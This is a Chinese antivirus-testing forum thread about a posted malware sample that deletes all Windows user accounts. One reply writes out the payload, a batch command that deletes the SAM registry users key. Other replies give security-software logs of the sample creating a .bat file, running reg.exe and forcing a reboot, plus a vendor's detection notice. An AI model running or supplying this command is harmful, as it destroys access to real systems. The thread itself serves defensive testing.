查看: 11294|回复: 81
收起左侧

[病毒样本] 删除所有账户(包括内置账户)

  [复制链接]
深山红叶__
发表于 2014-6-6 23:31:23 | 显示全部楼层 |阅读模式
本帖最后由 深山红叶__ 于 2014-6-8 18:56 编辑
测试工具已更新。

最好虚拟机运行,实机运行请套个影子什么的

时间不够,做得很粗糙...


此功能将加入http://bbs.kafan.cn/thread-1717709-1-1.html中,更新时间暂不可定,最近应该可以放进去吧。
顺便http://bbs.kafan.cn/thread-1717709-1-1.html求回帖,如果被系统自动锁了那就只好重开帖子更新了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
vm001
发表于 2014-6-7 09:13:54 | 显示全部楼层
@echo off
cmd /k reg delete HKLM\SAM\SAM\Domains\Account\Users /f
流星街
发表于 2014-6-7 10:16:04 | 显示全部楼层
山山挂了~
Qutianshang
发表于 2014-6-7 10:43:16 | 显示全部楼层
本帖最后由 Qutianshang 于 2014-6-7 11:51 编辑

重启出现12天过期??

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
cn86li
发表于 2014-6-7 11:05:53 | 显示全部楼层
本帖最后由 cn86li 于 2014-6-10 18:06 编辑

To GD

ticket number is 2014060703000002
Hello,

Thank you for your patience.
The analysis of the file / website has been completed:

The file is infected.
Detection will be added.


File test_exe declared INFECTED

Please do not hesitate to contact us should you have any other inquiries in the future.

Have a great day.
折腾哥
发表于 2014-6-7 11:16:15 | 显示全部楼层
卡卡 挂了
tg123321
发表于 2014-6-7 11:27:59 | 显示全部楼层
2014-6-7 11:26:39        f:\fvirustest\test\test.exe        修改注册表项权限        HKEY_LOCAL_MACHINE\SAM\SAM        阻止        [注册表组]◆ 系统相关设置(阻止) -> [注册表]HKEY_LOCAL_MACHINE\SAM\*       
2014-6-7 11:26:39        f:\fvirustest\test\test.exe        创建文件        F:\fvirustest\Test\KaFan Test.bat        阻止        [文件组]☆ 潜在威胁行为(阻止) -> [文件]*; *.bat       
过百度杀毒国际版
hddu
发表于 2014-6-7 11:36:39 | 显示全部楼层
2014-06-07 11:33:38    创建文件      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Test\KaFan Test.bat
触发规则:所有程序规则->Documents and Settings设置(二)->?:\Documents and Settings\*\桌面\*


2014-06-07 11:33:39    运行应用程序      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c "KaFan Test.bat"
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/k reg delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:所有程序规则->系统程序设置->*\reg.exe


2014-06-07 11:33:47    关闭/重启系统      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe

触发规则:所有程序规则->*

饭@avast
发表于 2014-6-7 11:40:58 | 显示全部楼层
BD

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
柯林
发表于 2014-6-7 11:43:45 | 显示全部楼层
直接挂掉(图又被限制上传了)


日志就一条:2014/6/7        11:39:56        已由访问保护规则禁止         SGZ-PC\SGZ        C:\Users\SGZ\Downloads\Test.exe        C:\Users\SGZ\Downloads\KaFan Test.bat        用户定义的规则:禁止未知程序任何文件操作        已阻止的操作: 创建
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-18 10:25 , Processed in 0.147591 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表